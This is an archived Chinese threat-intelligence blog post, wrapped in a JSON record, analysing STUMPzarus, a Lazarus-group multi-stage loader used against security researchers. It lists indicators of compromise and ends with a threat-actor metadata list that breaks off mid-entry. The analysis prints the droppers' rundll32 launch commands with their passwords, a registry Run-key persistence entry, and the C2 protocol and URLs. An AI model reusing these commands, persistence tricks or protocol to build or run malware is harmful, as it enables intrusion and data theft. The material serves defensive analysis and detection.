{ "id": "b54c67c2-ff43-4397-b2cd-6caa8a55ad93", "created_at": "2026-04-06T00:15:13.953595Z", "updated_at": "2026-04-10T13:12:11.508147Z", "deleted_at": null, "sha1_hash": "51123e82cb5de63c9bbba25e92276c0a26276a3e", "title": "认识STUMPzarus——APT组织Lazarus近期定向攻击组件深入分析 – 绿盟科技技术博客", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1839916, "plain_text": "认识STUMPzarus——APT组织Lazarus近期定向攻击组件深入分析 –\r\n绿盟科技技术博客\r\nBy Meet The Author\r\nPublished: 2021-01-29 · Archived: 2026-04-05 19:21:56 UTC\r\n阅读: 2,865\r\n一.  事件背景\r\n此次事件由Google安全团队披露。攻击者通过在Twitter建立多个安全研究者账号,发布大量的漏洞分析文章吸\r\n引漏洞安全研究者的关注,同时建立了一个研究博客,发布0day相关的漏洞研究及分析。通过这一方法,筛选\r\n并找到潜在的目标,并与之互动。攻击者利用了研究者需要实时关注行业中漏洞披露状况的心理,成功吸引了\r\n一些研究者的关注,并通过私信等方式,请求与研究者即潜在的攻击目标一起分析所谓的0day,在研究者答应\r\n合作后,发送所谓的“POC”工程文件,该伪造的POC工程文件是一个VS工程文件,其中嵌入了恶意代码。当研\r\n究人员打开该工程文件后,恶意代码会立即运行起来。根据Google研究团队披露的信息,有些研究人员访问攻\r\n击者运营的研究博客时也感染了病毒,但研究人员的Chrome浏览器为最新版本,由此推测可能存在浏览器\r\n0day。\r\n二、Lazarus Group介绍\r\nLazarus是来自朝鲜的APT组织,亦被称为HIDDEN COBRA或APT38,最早于09年就开始了攻击活动,主要攻击\r\n目标为韩国、东亚和东南亚国家的政企工作人员。最近几年,Lazarus活动较为频繁,甚至攻击了COVID-19相关\r\n的制药公司。Lazarus组织的常用工具包括DDoS僵尸网络、键盘记录器、远控工具和间谍软件等。\r\n三、恶意文件分析\r\n3.1样本关系\r\n本次针对安全研究人员的定向攻击事件中出现的木马皆带有两层外壳,遵循以下调用关系:\r\n4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244 –drop–\u003e\r\na75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855 –drop–\u003e\r\na08d24f74027256c6fd5c5a2fdb15b12889971fbdcfa7a28ffebbfe8b15aaefb\r\n最终阶段的木马程序是由Lazarus组织曾经使用过的DRATzarus木马演化而来,我们将该木马暂命名为\r\nSTUMPzarus。\r\n3.2攻击阶段\r\n本次事件中的恶意程序使用多级释放的方式启动自身。根据披露文档描述,该事件中最外层Dll程序\r\n4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244是伪装成VS工程项目中db文件的恶意运\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 1 of 13\n\n行库,后续阶段的恶意文件皆以dll的形式包裹于上一级dropper程序中。所有层级的恶意程序皆需要命令行中传\r\n递的密码或参数才能正确执行。\r\n3.2.1 Stage1: 4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244\r\n该文件是64位DLL文件,主要代码位于导出函数CMS_dataFinalW中。\r\n该DLL运行时需要以下启动参数:\r\nC:\\\\Windows\\\\System32\\\\rundll32.exe [thisfilepath], CMS_dataFinal Bx9yb37GEcJNK6bt [4bytes_prefix],其中\r\n[4bytes_prefix]值不定,会被后续阶段的木马程序使用。\r\n该DLL检测进程中是否包含以下名称:\r\nname vendor\r\navp.exe Kaspersky\r\navastui.exe Avast\r\n如果未发现这些进程,则将以下内容写入注册表自启动项\r\nSOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\中:\r\nValueName Value\r\nOneDrive_Update\r\nC:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\ProgramData\\\\VMware\\\\vmnat-update.bin, OCSP_resp_find lxUi5CZ0IV45j89Y [4bytes_prefix]\r\n释放程序内含的PE文件,保存为C:\\\\ProgramData\\\\VMware\\\\vmnat-update.bin,随后使用注册表值相同的指令运行\r\n该文件。该文件是第二阶段的Dropper程序。\r\n3.2.2 Stage2: a75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855\r\n该文件是64位DLL文件,主要代码位于导出函数OCSP_resp_findW中。\r\n该DLL运行时需要以下启动参数:\r\nC:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\ProgramData\\\\VMware\\\\vmnat-update.bin, OCSP_resp_find\r\nlxUi5CZ0IV45j89Y [4bytes_prefix]\r\n3.2.3  Stage3: a08d24f74027256c6fd5c5a2fdb15b12889971fbdcfa7a28ffebbfe8b15aaefb\r\n该程序与一阶段Dropper的代码结构类似,主要功能为释放并解压程序内含的PE文件,加载至内存运行,同时将\r\n[4bytes_prefix]传递给该程序。\r\nStage3:a08d24f74027256c6fd5c5a2fdb15b12889971fbdcfa7a28ffebbfe8b15aaefb\r\n该木马程序为本次攻击事件的主要恶意组件,是一款加载远端攻击载荷进行窃密等行为的加载器木马。由该载\r\n荷通信流程可以推断,该木马实际上是整个攻击过程中的基础模块,可能与其后续载荷组成了主要执行信息采\r\n集的窃密系统。\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 2 of 13\n\n该木马在通信流程与代码实现上与clearsky公司于2020年8月披露的DRATzarus远控木马有一定相似性,可以认为\r\n是由DRATzarus木马演化而来。DRATzarus的相关事件“Dream Job”已被判定为由朝鲜APT组织Lazarus主导。\r\n基于该木马的主要功能,我们将其暂命名为STUMPzarus。\r\nDRATzarus相关内容详见https://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf\r\n3.3 同类型攻击流程\r\n在谷歌披露的攻击事件中,其他样本组成了完全相同的文件释放流程。\r\n释放流程1:\r\n68e6b9d71c727545095ea6376940027b61734af5c710b2985a628131e47c6af7 –drop–\u003e\r\n25d8ae4678c37251e7ffbaeddc252ae2530ef23f66e4c856d98ef60f399fa3dc –drop–\u003e\r\ncb0f1aa2a59115d038235bcbfa28f1958bd1caf4189265a3c61974114b402e03\r\n释放流程2:\r\n284df008aa2459fd1e69b1b1c54fb64c534fce86d2704c4d4cc95d72e8c11d6f –drop–\u003e\r\n913871432989378a042f5023351c2fa2c2f43b497b75ef2a5fd16d65aa7d0f54 –drop–\u003e\r\ndcd0d70eb8384d00be9522b121194afff1dd91325bb672a8849afb739f80f58c\r\n以上攻击流程与前述流程完全一致,最终同样释放了STUMPzarus木马。\r\n以上STUMPzarus携带的三个CnC地址分别为:\r\nhttps[:]//codevexillium.org/image/download/download.asp\r\nhttps[:]//codevexillium.org/image/download/download.asp\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\n和\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\n3.4 恶意文件通信过程分析\r\n3.4.1  基本格式\r\n3.4.1.1 Agent请求\r\n该木马的基本通信模式为https,每次通信皆由Agent端发送特定格式的POST包,CnC端响应该请求并发送数据。\r\nAgent端POST包复原后有以下格式:\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 3 of 13\n\nPOST /image/download/download.asp HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 7.0;\r\nWindows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR\r\n3.0.30729; .NET CLR 3.5.30729) Host: codevexillium.org Content-Type: application/x-www-form-urlencoded Connection: Keep-Alive  \r\nPW=GQWLXM\u0026DTUXG=YWJjZFpUd3dPYzBoQ05iTg==\u0026HDFV=\u0026XPTERQ=0\u0026EVYNQM=52\u0026JQRMAQ\r\n=MgAwADIAMQAtADAAMQAtADIANwAgADEANQA6ADEAOAA6ADMAOQA=\u0026BBYXCYGNER=LBBON\r\nCVIQHJUYC\u0026RXBVB=QOZUYRDUX\r\n该数据包的正文部分包含多个参数,参数名、数值与含义见下表:\r\n参数项号 参数名\r\n参数名长\r\n度\r\n参数内容\r\n参数内容长\r\n度\r\n1\r\n随机大写字\r\n母\r\n2字节 随机大写字母,其长度作为\r\npacketcode\r\n不定长\r\n2\r\n随机大写字\r\n母\r\n5字节 base64转码后的sID 24字节\r\n3\r\n随机大写字\r\n母\r\n4字节 base64转码后的附加数据A 不定长\r\n4\r\n随机大写字\r\n母\r\n6字节 数据包类型标记packetmark 1字节\r\n5\r\n随机大写字\r\n母\r\n6字节 附加数据B长度 通常为2字\r\n节\r\n6\r\n随机大写字\r\n母\r\n6字节 base64转码后的附加数据B 不定长\r\n7~9(个数不\r\n定)\r\n随机大写字\r\n母\r\n不定长 无意义随机值 不定长\r\n参数项1的值字段长度被作为packetcode,木马程序使用该数值表示当前通信状态;\r\n参数项2包含的sID为程序启动参数指定的[4bytes_prefix]+12字节随机字符;\r\n参数项3未被木马实际使用;\r\n参数项4的值字段包含数据包类型标记packetmark,在部分通信中,木马程序使用该数值表示数据是否已发送完\r\n成;\r\n参数项6的值可能包括时间字符串、内容长度、附加内容等,各部分使用”|”分隔。\r\n3.4.1.2 CnC回复\r\nCnC回复内容全部使用base64转码,并将其中的”+”号替换为空格。 \r\n3.4.1.2.1 通信形式\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 4 of 13\n\n根据木马逻辑,该通信过程分为以下几种形式:\r\n上线\u0026键传递:\r\n该通信发生于Agent首次连接CnC时。\r\nCnC向Agent发送一个坐标值,用于初始化椭圆曲线的公钥,后续的加密通信将基于该椭圆曲线进行构建。\r\nAgent: 发送A类请求包,packetcode为6,packetmark为0;\r\nCnC: 回复base64转码的数据包;\r\n正常情况下,CnC发送的数据包头部为宽字符L”0″,Agent保存数据包的后续内容,作为椭圆曲线的坐标并初始\r\n化公钥,该木马选用了secp521r1曲线。\r\nAgent使用的椭圆曲线私钥为随机生成的0x20长度大写字母字符串。\r\n连接维持\u0026参数传递:\r\n该通信发生于Agent收到公钥之后。\r\nAgent不断发送POST包以保持连接,同时等待CnC发送的加密参数字符串;\r\nAgent:发送B类请求包,packetcode为10,packetmark为0;\r\nCnC:回复使用EC加密+base64转码的数据包;\r\nCnC发送的数据包头部为宽字符L”1″时,Agent不断发送B类请求包,以保持连接;\r\nCnC发送的数据包头部为L”1″以外的字符时,后续内容为以”|”分隔的5个参数信息:\r\n参数1 新的通信容量\r\n参数2 下一阶段载荷文件长度\r\n参数3 载荷入口函数的标志字符串\r\n参数4 载荷入口函数的参数\r\n参数5 数据校验哈希\r\n其中参数1中通信容量用于限制Agent在正文中附加内容的长度。\r\n载荷传递:\r\n该通信发生于Agent收到参数字符串之后。\r\nAgent发送特定POST包后,CnC回复一个加密后的PE文件作为攻击载荷;\r\nAgent:发送C类请求包,packetcode为7,packetmark为0;\r\nCnC:回复使用EC加密+base64转码的数据包,内容为PE文件;\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 5 of 13\n\nAgent随后使用上述参数5对应的数据校验哈希对解密后的PE文件进行校验,该校验哈希计算方法为对文件的\r\nmd5值进行以下转码:\r\n当Agent全部通信过程都正确完成且哈希校验成功后,程序载入CnC下发的PE文件并执行其入口函数:\r\n载荷通信:\r\n该通信发生于Agent将CnC回复的攻击载荷执行之后。\r\nAgent读取载荷运行得到的结果,并将其发送给CnC;\r\nAgent:发送E类请求包,packetcode为12,packetmark为2或3;\r\nCnC:回复base64转码的数据包;\r\n进行此类通信时,Agent使用发送请求包正文中的参数项6,将载荷函数运行后的结果传递给CnC,该结果使用\r\nEC加密。此外,参数项4中的packetmark可能为以下值,用于通知CnC该数据是否已发送完成:\r\npacketmark meaning\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 6 of 13\n\n2 数据未发送完成\r\n3 数据发送完成\r\nCnC回复的数据包头部为宽字符L”0″时,Agent重置通信流程并休眠1200秒;\r\nCnC回复的数据包头部为L”0″以外的字符时,Agent重新进入连接维持\u0026参数传递模式。\r\n由该载荷通信流程可以推断,该木马可能是主要执行信息采集的间谍木马。\r\n错误报告:\r\n该通信发生于Agent发现上述各阶段通信中CnC回复存在错误时。\r\nAgent:发送D类请求包,packetcode为11,packetmark为0;\r\nCnC:回复base64转码的数据包;\r\nCnC回复的数据包头部为宽字符L”0″时,Agent继续执行;\r\nCnC回复的数据包头部为L”0″以外的字符时,Agent关闭网络句柄。\r\n小结\r\n由STUMPzarus木马的通信逻辑可以看出,该木马构建了与CnC之间完整的加密通信流程,CnC下发的攻击组件\r\n只需实现具体的功能函数并将运行结果传递给STUMPzarus木马即可。这也是我们将其称为stump的原因。\r\n四. 组织关联\r\n4.1 关联分析\r\n该事件中STUMPzarus木马与已确认Lazarus攻击工具DRATzarus木马在代码和逻辑层面有大量相似之处,包括:\r\n相同的POST包正文字符串生成逻辑\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 7 of 13\n\nCnC回复中相似的base64转码后处理逻辑\r\n使用命令行参数中传递的密码作为启动条件\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 8 of 13\n\n相同的PE加载函数实现\r\n除以上特征外,两组工具还有大量其他相似代码,包括完全相同的RC4实现、相似的CnC回复判断逻辑等。\r\n由以上相似点可以推断,STUMPzarus木马是在DRATzarus木马代码的基础上修改得到的,并且编入了openssl\r\n库,使用椭圆曲线加密通信替换了DRATzarus木马原有的RC4通信逻辑,在通信安全性上更为完善。\r\n此外,STUMPzarus与mcafee披露的NorthStar行动(https://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/)中发现的Torisma木马也有一定相似性\r\n相似的基于随机数的CnC地址选择方式:\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 9 of 13\n\n相似的CnC地址格式:\r\nSTUMPzarus Torisma\r\nhttps[:]//codevexillium.org/image/download/\r\ndownload.asp\r\nhttps[:]//www.dronerc.it/shop_testbr/\r\nupload/upload.php\r\nhttps[:]//transplugin.io/upload/upload.asp\r\nhttps[:]//www.commodore.com.tr/mobiquo/app\r\nExtt/notdefteri/writenote.php\r\nhttps[:]//www.scimpex.com/admin/assets/back\r\nup/requisition/requisition.php\r\nhttps[:]//www.fabianiarte.com/newsletter/arte/\r\nview.asp\r\n该Torisma木马是间谍程序,可以根据其使用的CnC地址www.fabianiarte.com关联至Lazarus组织的DreamJob行\r\n动。\r\n4.2 组织特征\r\n通过对STUMPzarus木马以及Lazarus组织过往攻击攻击工具的分析,我们认为近期Lazarus攻击工具有以下特征:\r\n冗余设计\r\n作为一个窃密系统的基础设施,STUMPzarus木马的通信逻辑显然过于复杂了。Lazarus开发者在该工具的通信协\r\n议上分别使用了https、混淆、字符替换、垃圾信息、secp521r1曲线等增加保密性的手段,木马通过多个标志位\r\n与CnC通信,并至少进行包括键传递、参数传递、载荷传递在内的3轮通信后才可能获取到具体的攻击载荷。\r\n虽然APT组织总会不遗余力地强化自己攻击过程的隐蔽性,但以上通信流程设计中有大量功能重复的部分,很\r\n难起到1+1=2的效果。\r\n这样的冗余设计在Lazarus组织的DreamJob行动中就有所体现。Lazarus开发者在DRATzarus木马中同时使用了\r\nhttps和RC4加密通信流量,将运行参数独立为配置文件放入PE文件中,此外还为其设计了一个全局标记,用于\r\n指定程序的运行模式。当标志值为0x3456时,程序以隐匿模式运行,当标志值为0x3457时,程序以记录模式运\r\n行,会将配置文件相关信息保存在注册表键中。这样的设计在较少考虑代码优化的APT工具开发过程中比较少\r\n见。\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 10 of 13\n\n我们无法确定Lazarus开发者进行此类冗余设计的目的,但这样的设计风格显然给组织定性提供了依据。\r\n验参执行\r\nLazarus开发者热衷于在执行参数中设置PE文件执行的密码。\r\n在STUMPzarus木马各阶段Dropper中,程序分别使用Bx9yb37GEcJNK6bt和lxUi5CZ0IV45j89Y等字符串参数作为\r\n自身的启动密码,同类型攻击链中的所有droper程序也都各自设置了启动密码;DRATzarus木马具有同样的逻\r\n辑,使用844513479字符串作为启动密码;此外,早在2019年发现的Lazarus攻击组件Curiofireza,同样使用了该\r\n方式来获得用于解密下阶段载荷的密码。\r\n这种验参执行的方式是一种低成本的对抗手段,可以规避一些沙箱环境和自动化分析系统。也许正是因为过于\r\n依赖这样的启动条件,Lazarus开发者没有给木马程序添加常规的环境检测代码。\r\n五. 总结\r\n通过对本次定向攻击事件中出现的恶意程序及关联攻击工具的分析,我们辨识了一种新的APT攻击组件,并确\r\n认了其与Lazarus组织的紧密联系。\r\n我们从本次事件中观察发现,Lazarus组织最终投递的载荷由纯功能性的RAT木马、SPY木马向STUMP组件转\r\n变。这样的改变提高了攻击者对攻击目的的选择和支配能力。该现象也体现了APT组织攻击框架的常见迭代过\r\n程。\r\n附录:IOC\r\n一阶段dropper\r\n4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244\r\n68e6b9d71c727545095ea6376940027b61734af5c710b2985a628131e47c6af7\r\n284df008aa2459fd1e69b1b1c54fb64c534fce86d2704c4d4cc95d72e8c11d6f\r\n二阶段dropper\r\na75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855\r\n25d8ae4678c37251e7ffbaeddc252ae2530ef23f66e4c856d98ef60f399fa3dc\r\n913871432989378a042f5023351c2fa2c2f43b497b75ef2a5fd16d65aa7d0f54\r\nSTUMPzarus\r\na08d24f74027256c6fd5c5a2fdb15b12889971fbdcfa7a28ffebbfe8b15aaefb\r\ncb0f1aa2a59115d038235bcbfa28f1958bd1caf4189265a3c61974114b402e03\r\ndcd0d70eb8384d00be9522b121194afff1dd91325bb672a8849afb739f80f58c\r\nCnC\r\nhttps[:]//codevexillium.org/image/download/download.asp\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 11 of 13\n\nhttps[:]//www.dronerc.it/shop_testbr/upload/upload.php\r\nhttps[:]//transplugin.io/upload/upload.asp\r\nhttps[:]//angeldonationblog.com/image/upload/upload.php\r\n其他来自google的IoC:\r\nBlog地址\r\nhttps://blog.br0vvnn[.]io\r\nTwitter账号\r\nhttps://twitter.com/br0vvnn\r\nhttps://twitter.com/BrownSec3Labs\r\nhttps://twitter.com/dev0exp\r\nhttps://twitter.com/djokovic808\r\nhttps://twitter.com/henya290\r\nhttps://twitter.com/james0x40\r\nhttps://twitter.com/m5t0r\r\nhttps://twitter.com/mvp4p3r\r\nhttps://twitter.com/tjrim91\r\nhttps://twitter.com/z0x55g\r\nTelegram\r\nhttps://t.me/james50d\r\nKeybase\r\nhttps://keybase.io/zhangguo\r\n关联样本hash\r\na4fb20b15efd72f983f0fb3325c0352d8a266a69bb5f6ca2eba0556c3e00bd15\r\nC\u0026C域名\r\nangeldonationblog[.]com\r\ncodevexillium[.]org\r\ninvestbooking[.]de\r\nkrakenfolio[.]com\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 12 of 13\n\nopsonew3org[.]sg\r\ntransferwiser[.]io\r\ntransplugin[.]io\r\nC\u0026C URL\r\nhttps[:]//investbooking[.]de/upload/upload.asp\r\nhttps[:]//www.dronerc[.]it/forum/uploads/index.php\r\nhttps[:]//www.dronerc[.]it/shop_testbr/upload/upload.php\r\nhttps[:]//www.edujikim[.]com/intro/blue/insert.asp\r\nhttps[:]//www.fabioluciani[.]com/es/include/include.asp\r\nhttp[:]//trophylab[.]com/notice/images/renewal/upload.asp\r\nhttp[:]//www.colasprint[.]com/_vti_log/upload.asp\r\n附录:参考链接\r\nhttps://blog.google/threat-analysis-group/new-campaign-targeting-security-researchers/\r\nhttps://www.clearskysec.com/wp-content/uploads/2020/08/Dream-Job-Campaign.pdf\r\nhttps://www.mcafee.com/blogs/other-blogs/mcafee-labs/operation-north-star-behind-the-scenes/\r\n关于伏影实验室\r\n伏影实验室专注于安全威胁监测与对抗技术研究。\r\n研究目标包括Botnet、APT高级威胁,DDoS对抗,WEB对抗,流行服务系统脆弱利用威胁、身份认证威胁,数\r\n字资产威胁,黑色产业威胁及新兴威胁。通过掌控现网威胁来识别风险,缓解威胁伤害,为威胁对抗提供决策\r\n支撑。\r\nSource: http://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nhttp://blog.nsfocus.net/stumbzarus-apt-lazarus/\r\nPage 13 of 13", "extraction_quality": 1, "language": "ZH", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "http://blog.nsfocus.net/stumbzarus-apt-lazarus/" ], "report_names": [ "stumbzarus-apt-lazarus" ], "threat_actors": [ { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f426f0a0-faef-4c0e-bcf8-88974116c9d0", "created_at": "2022-10-25T15:50:23.240383Z", "updated_at": "2026-04-10T02:00:05.299433Z", "deleted_at": null, "main_name": "APT38", "aliases": [ "APT38", "NICKEL GLADSTONE", "BeagleBoyz", "Bluenoroff", "Stardust Chollima", "Sapphire Sleet", "COPERNICIUM" ], "source_name": "MITRE:APT38", "tools": [ "ECCENTRICBANDWAGON", "HOPLIGHT", "Mimikatz", "KillDisk", "DarkComet" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", "VEILEDSIGNAL", "VHD", "VHD Ransomware", "VIVACIOUSGIFT", "VSingle", "ValeforBeta", "Volgmer", "Vyveva", "W1_RAT", "Wana Decrypt0r", "WanaCry", "WanaCrypt", "WanaCrypt0r", "WannaCry", "WannaCrypt", "WannaCryptor", "WbBot", "Wcry", "Win32/KillDisk.NBB", "Win32/KillDisk.NBC", "Win32/KillDisk.NBD", "Win32/KillDisk.NBH", "Win32/KillDisk.NBI", "WinorDLL64", "Winsec", "WolfRAT", "Wormhole", "YamaBot", "Yort", 